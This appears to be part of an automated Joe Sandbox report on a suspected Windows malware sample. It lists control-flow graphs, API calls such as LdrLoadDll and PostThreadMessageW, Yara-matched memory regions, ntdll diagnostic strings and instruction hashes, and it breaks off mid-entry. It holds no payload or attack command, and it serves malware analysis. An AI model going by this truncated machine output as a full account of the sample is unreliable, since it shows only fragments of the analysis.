                      • Source File: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_03.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 3y36225$3y36225
                      • API String ID: 0-273086695

                      Control-flow Graph

                      APIs
                      • PostThreadMessageW.USER32(3y36225,00000111,00000000,00000000), ref: 0041451A
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_03.jbxd
                      Yara matches
                      Similarity
                      • API ID: MessagePostThread
                      • String ID: 3y36225$3y36225
                      • API String ID: 1836367815-273086695

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 62 417e56-417e59 63 417e72-417e8c call 42e433 62->63 64 417e5b 62->64 71 417e92-417ea0 call 42e953 63->71 72 417e8e-417e91 63->72 65 417e5d-417e60 64->65 66 417ebe-417ec1 64->66 65->63 69 417ec3-417ed7 LdrLoadDll 66->69 70 417eda-417edd 66->70 69->70 75 417eb0-417ec1 call 42cdf3 71->75 76 417ea2-417ead call 42ebf3 71->76 75->69 75->70 76->75
                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417ED5
                      Memory Dump Source
                      • Source File: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_03.jbxd
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 81 42bb73-42bbb7 call 404a33 call 42c903 RtlAllocateHeap
                      APIs
                      • RtlAllocateHeap.NTDLL(00000104,E5B4FE69,004246EF,E5B4FE69,?,004246EF,E5B4FE69,00000104,E5B4FE69), ref: 0042BBB2
                      Memory Dump Source
                      • Source File: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_03.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 86 42bbc3-42bc04 call 404a33 call 42c903 RtlFreeHeap
                      APIs
                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F84589F4,00000007,00000000,00000004,00000000,0041773D,000000F4,?,?,?,?,?), ref: 0042BBFF
                      Memory Dump Source
                      • Source File: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_03.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeHeap
                      • String ID:
                      • API String ID: 3298025750-0

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 96 42bc13-42bc4c call 404a33 call 42c903 ExitProcess
                      APIs
                      • ExitProcess.KERNEL32(?,00000000,?,?,ED83A847,?,?,ED83A847), ref: 0042BC47
                      Memory Dump Source
                      • Source File: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_03.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID:
                      • API String ID: 621844428-0

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 101 1772c0a-1772c0f 102 1772c11-1772c18 101->102 103 1772c1f-1772c26 LdrInitializeThunk 101->103
                      APIs
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                      • API String ID: 0-2160512332
                      Strings
                      • Invalid debug info address of this critical section, xrefs: 017A54B6
                      • Thread identifier, xrefs: 017A553A
                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A54E2
                      • Critical section address., xrefs: 017A5502
                      • Critical section debug info address, xrefs: 017A541F, 017A552E
                      • corrupted critical section, xrefs: 017A54C2
                      • Thread is in a state in which it cannot own a critical section, xrefs: 017A5543
                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A54CE
                      • Address of the debug info found in the active list., xrefs: 017A54AE, 017A54FA
                      • 8, xrefs: 017A52E3
                      • double initialized or corrupted critical section, xrefs: 017A5508
                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A540A, 017A5496, 017A5519
                      • Critical section address, xrefs: 017A5425, 017A54BC, 017A5534
                      • undeleted critical section in freed memory, xrefs: 017A542B
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                      • API String ID: 0-2368682639
                      Strings
                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 017A261F
                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 017A2412
                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 017A2624
                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 017A2602
                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 017A2506
                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 017A2498
                      • @, xrefs: 017A259B
                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 017A2409
                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017A24C0
                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017A25EB
                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017A22E4
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                      • API String ID: 0-4009184096
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                      • API String ID: 0-2515994595
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                      • API String ID: 0-1700792311
                      Strings
                      • VerifierFlags, xrefs: 017B8C50
                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017B8A3D
                      • AVRF: -*- final list of providers -*- , xrefs: 017B8B8F
                      • VerifierDlls, xrefs: 017B8CBD
                      • VerifierDebug, xrefs: 017B8CA5
                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017B8A67
                      • HandleTraces, xrefs: 017B8C8F
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                      • API String ID: 0-3223716464
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                      • API String ID: 0-792281065
                      Strings
                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017899ED
                      • LdrpInitShimEngine, xrefs: 017899F4, 01789A07, 01789A30
                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01789A01
                      • minkernel\ntdll\ldrinit.c, xrefs: 01789A11, 01789A3A
                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01789A2A
                      • apphelp.dll, xrefs: 01726496
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                      • API String ID: 0-204845295
                      Strings
                      • RtlGetAssemblyStorageRoot, xrefs: 017A2160, 017A219A, 017A21BA
                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 017A219F
                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 017A2178
                      • SXS: %s() passed the empty activation context, xrefs: 017A2165
                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017A21BF
                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 017A2180
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                      • API String ID: 0-861424205
                      Strings
                      • LdrpInitializeImportRedirection, xrefs: 017A8177, 017A81EB
                      • minkernel\ntdll\ldrredirect.c, xrefs: 017A8181, 017A81F5
                      • minkernel\ntdll\ldrinit.c, xrefs: 0176C6C3
                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 017A81E5
                      • LdrpInitializeProcess, xrefs: 0176C6C4
                      • Loading import redirection DLL: '%wZ', xrefs: 017A8170
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                      • API String ID: 0-475462383
                      APIs
                        • Part of subcall function 01772DF0: LdrInitializeThunk.NTDLL ref: 01772DFA
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770BA3
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770BB6
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770D60
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770D74
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                      • String ID:
                      • API String ID: 1404860816-0
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                      • API String ID: 0-379654539
                      Strings
                      • @, xrefs: 01768591
                      • minkernel\ntdll\ldrinit.c, xrefs: 01768421
                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0176855E
                      • LdrpInitializeProcess, xrefs: 01768422
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                      • API String ID: 0-1918872054
                      Strings
                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017A22B6
                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017A21D9, 017A22B1
                      • SXS: %s() passed the empty activation context, xrefs: 017A21DE
                      • .Local, xrefs: 017628D8
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                      • API String ID: 0-1239276146
                      Strings
                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 017A342A
                      • RtlDeactivateActivationContext, xrefs: 017A3425, 017A3432, 017A3451
                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 017A3437
                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 017A3456
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                      • API String ID: 0-1245972979
                      Strings
                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01791028
                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0179106B
                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017910AE
                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01790FE5
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                      • API String ID: 0-1468400865
                      Strings
                      • LdrpDynamicShimModule, xrefs: 0179A998
                      • minkernel\ntdll\ldrinit.c, xrefs: 0179A9A2
                      • apphelp.dll, xrefs: 01752462
                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0179A992
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                      • API String ID: 0-176724104
                      Strings
                      • HEAP: , xrefs: 01743264
                      • HEAP[%wZ]: , xrefs: 01743255
                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0174327D
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                      • API String ID: 0-617086771
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                      • API String ID: 0-4253913091
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: $@
                      • API String ID: 0-1077428164
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: FilterFullPath$UseFilter$\??\
                      • API String ID: 0-2779062949
                      Strings
                      • Failed to allocated memory for shimmed module list, xrefs: 0179A10F
                      • LdrpCheckModule, xrefs: 0179A117
                      • minkernel\ntdll\ldrinit.c, xrefs: 0179A121
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                      • API String ID: 0-161242083
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                      • API String ID: 0-1334570610
                      Strings
                      • minkernel\ntdll\ldrinit.c, xrefs: 017A82E8
                      • LdrpInitializePerUserWindowsDirectory, xrefs: 017A82DE
                      • Failed to reallocate the system dirs string !, xrefs: 017A82D7
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                      • API String ID: 0-1783798831
                      Strings
                      • PreferredUILanguages, xrefs: 017EC212
                      • @, xrefs: 017EC1F1
                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017EC1C5
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                      • API String ID: 0-2968386058
                      Strings
                      Similarity
                      • API ID:
                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                      • API String ID: 0-1373925480
                      Strings
                      • LdrpCheckRedirection, xrefs: 017B488F
                      • minkernel\ntdll\ldrredirect.c, xrefs: 017B4899
                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017B4888
                      Similarity
                      • API ID:
                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                      • API String ID: 0-3154609507
                      Strings
                      Similarity
                      • API ID:
                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                      • API String ID: 0-2558761708
                      Strings
                      • LdrpInitializationFailure, xrefs: 017B20FA
                      • Process initialization failed with status 0x%08lx, xrefs: 017B20F3
                      • minkernel\ntdll\ldrinit.c, xrefs: 017B2104
                      Similarity
                      • API ID:
                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                      • API String ID: 0-2986994758
                      APIs
                      Strings
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: #%u
                      • API String ID: 48624451-232158463
                      Strings
                      • LdrResSearchResource Exit, xrefs: 0173AA25
                      • LdrResSearchResource Enter, xrefs: 0173AA13
                      Similarity
                      • API ID:
                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                      • API String ID: 0-4066393604
                      Strings
                      Similarity
                      • API ID:
                      • String ID: `$`
                      • API String ID: 0-197956300
                      Strings
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: Legacy$UEFI
                      • API String ID: 2994545307-634100481
                      Strings
                      Similarity
                      • API ID:
                      • String ID: @$MUI
                      • API String ID: 0-17815947
                      Strings
                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0173063D
                      • kLsE, xrefs: 01730540
                      Similarity
                      • API ID:
                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                      • API String ID: 0-2547482624
                      Strings
                      • RtlpResUltimateFallbackInfo Enter, xrefs: 0173A2FB
                      • RtlpResUltimateFallbackInfo Exit, xrefs: 0173A309
                      Similarity
                      • API ID:
                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                      • API String ID: 0-2876891731
                      Strings
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: Cleanup Group$Threadpool!
                      • API String ID: 2994545307-4008356553
                      Strings
                      Similarity
                      • API ID:
                      • String ID: MUI
                      • API String ID: 0-1339004836
                      Strings
                      Similarity
                      • API ID:
                      • String ID: GlobalTags
                      • API String ID: 0-1106856819
                      Strings
                      Similarity
                      • API ID:
                      • String ID: .mui
                      • API String ID: 0-1199573805
                      Strings
                      Similarity
                      • API ID:
                      • String ID: EXT-
                      • API String ID: 0-1948896318
                      Strings
                      Similarity
                      • API ID:
                      • String ID: BinaryHash
                      • API String ID: 0-2202222882
                      Strings
                      Similarity
                      • API ID:
                      • String ID: #
                      • API String ID: 0-1885708031
                      Strings
                      Similarity
                      • API ID:
                      • String ID: BinaryName
                      • API String ID: 0-215506332
                      Strings
                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 017B895E
                      Similarity
                      • API ID:
                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                      • API String ID: 0-702105204
                      • Instruction ID: 1a890e10d7ae7b868d79a466dcc314bfde5ebadfa0e67887fac1ad249cf27dbd
                      • Opcode Fuzzy Hash: a78c86c36fa352a6bc5ed8541deed80f9aa7014c28c12b10138a4f120d6f38f3
                      • Instruction Fuzzy Hash: 00B17070A002668BDB75DF69C880BADF7B1EF54700F2485EAD50AE7245EB70DD86CB21
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fa940caca15313f236dcba695bbd30dda6a3ecf92a2793fb859b1978b48c84f4
                      • Instruction ID: 22200c4d9c7d91badbc864b7f3649d3894927b63049db704fb01ac2018285f50
                      • Opcode Fuzzy Hash: fa940caca15313f236dcba695bbd30dda6a3ecf92a2793fb859b1978b48c84f4
                      • Instruction Fuzzy Hash: 0CA13531E00659AFEF22DF58D848BAEFFB4EB01754F144161EE50AB291DBB49E44CB90
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4bc23c606a3d059d7f039a67c3dd80c3a322e503a007e49fecdfc210562323ab
                      • Instruction ID: 87ad28ca5e0b3cf6bfdf7157e9486b6137bd61ff950508f0d2ca4edf1088d241
                      • Opcode Fuzzy Hash: 4bc23c606a3d059d7f039a67c3dd80c3a322e503a007e49fecdfc210562323ab
                      • Instruction Fuzzy Hash: FBA1AE71B0061ADBDF25CF69C990BAAF7F1FF56318F104129EA4597282EB34E911CB90
                      Memory Dump Source
